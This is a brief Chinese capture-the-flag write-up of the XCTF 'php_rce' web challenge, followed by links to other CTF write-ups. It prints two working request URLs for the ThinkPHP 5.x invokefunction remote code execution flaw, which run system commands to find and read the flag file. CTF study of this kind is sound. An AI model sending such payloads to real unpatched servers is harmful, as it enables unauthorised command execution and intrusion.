攻防世界(进阶)--WEB--9.php_rce

作者: Du1in9 | 来源:发表于2020-02-15 18:44 被阅读0次

考察点：rce框架漏洞

1.进入场景，ThinkPHP框架，版本为5.1

2.查找字符串：flag

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

3.查看flag

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

攻防世界(进阶)--WEB--9.php_rce
考察点：rce框架漏洞 1.进入场景，ThinkPHP框架，版本为5.1 2.查找字符串：flag /index....
攻防世界-Web_php_unserialize
高手进阶区，Web_php_unserialize 题目来源：攻防世界[https://adworld.xctf....
攻防世界-unserialize3
高手进阶区，unserialize3 题目来源：攻防世界[https://adworld.xctf.org.cn/...
攻防世界进阶Re(二)
感觉难度越来越大了，把进阶题分为几篇来写，以便查看。 0x00 reverse-box 感觉都是没有看到过的题型，...
攻防世界高手进阶pwn
歇了很长一段时间，终于开始了我的攻防世界pwn之路。立一个flag：每日一题，只能多不能少。 0x00 dice_...
攻防世界进阶Re(三)
0x00 APK-逆向2 脚本如下： 0x01 notsequence 这道题有点意思哟，IDA打开，F5大法。 ...
攻防世界进阶Re(一)
0x00 re2-cpp-is-awesome IDA，f5主函数，找到关键判断。看到主要是判断v8和off_6...
攻防世界web进阶解题报告
cat 题目描述：抓住那只猫打开链接，首先看到了一个输入框让我们输入域名。输入百度的ip：220.181.38....
攻防世界--crypto--进阶区
0x01 你猜猜我们刚刚拦截了，敌军的文件传输获取一份机密文件，请君速速破解。密文解题思路504b0304开...
【攻防世界】高手进阶区 Recho WP
0x00 考察点考察点有三个： ROP链构造 Got表劫持 pwntools的shutdown功能 0x01 程...